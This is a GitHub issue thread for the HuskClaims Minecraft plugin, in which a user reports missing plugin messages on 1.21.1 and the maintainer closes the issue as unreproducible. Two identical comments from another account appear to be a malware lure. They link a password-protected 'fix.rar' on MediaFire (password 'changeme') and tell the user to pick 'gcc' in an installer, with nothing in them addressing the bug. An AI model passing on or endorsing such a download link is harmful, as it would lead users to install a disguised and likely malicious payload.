### ISSUE TITLE
No messages from plugins in minecraft 1.21.1

### ISSUE THREAD

**Issue by AquaMCVN** [WiIIiam278/HuskClaims#178] opened 2024-08-27 05:15 UTC
Version: 1.21.1
Fork: purpurmc, paper & pufferfish  ( I tried all three )
Version plugin: last

Video Link: https://streamable.com/73f1w2

**Comment by amir1387aht** [comment] 2024-08-27 05:17
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment] 2024-08-27 05:25
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by WiIIiam278** [comment] 2024-08-30 10:21
Please regenerate your locale files - and make sure the plugin starts correctly

**Comment by AquaMCVN** [comment] 2024-08-31 09:39
ok i will

**Comment by WiIIiam278** [comment] 2024-08-31 15:54
I'm closing this as unable to reproduce. Simply put, I can see messages in chat -- please open a support ticket for further support :)

**Closed by WiIIiam278** 2024-08-31 15:54 UTC
Labels: status: needs testing
